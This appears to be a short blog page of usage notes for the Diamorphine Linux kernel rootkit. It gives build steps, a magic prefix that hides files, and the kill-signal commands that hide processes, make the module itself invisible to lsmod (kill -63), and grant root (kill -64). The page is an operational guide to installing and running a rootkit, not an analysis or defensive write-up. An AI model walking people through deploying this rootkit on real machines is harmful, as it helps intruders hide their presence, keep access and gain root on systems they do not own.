home | whoami

Diamorphine Linux rootkit

tags: linux, lkm, rootkit, security, penetration testing

GitHub: https://github.com/m0nad/Diamorphine

Install build requirements

Debian/Ubuntu

sudo apt-get install linux-headers-`uname -r`

CentOS

yum install -y kernel-devel kernel-headers

Optional

Set your magic prefix for hidden files in diamorphine.h

// diamorphine.h
MAGIC_PREFIX "diamorphine_secret"

Compile and load the module

make && insmod diamorphine.ko

Usage

Hide/unhide process by sending signal 31

kill -31 <PID>

Diamorphine can hide files and directories.

If filename starts with the MAGIC_PREFIX defined in diamorphine.h, then file becomes invisble while diamorphine module is loaded.

Sending signal 63 to any pid makes the module (in)visible by lsmod

kill -63 0

Sending signal 64 to any pid gives root:

kill -64 0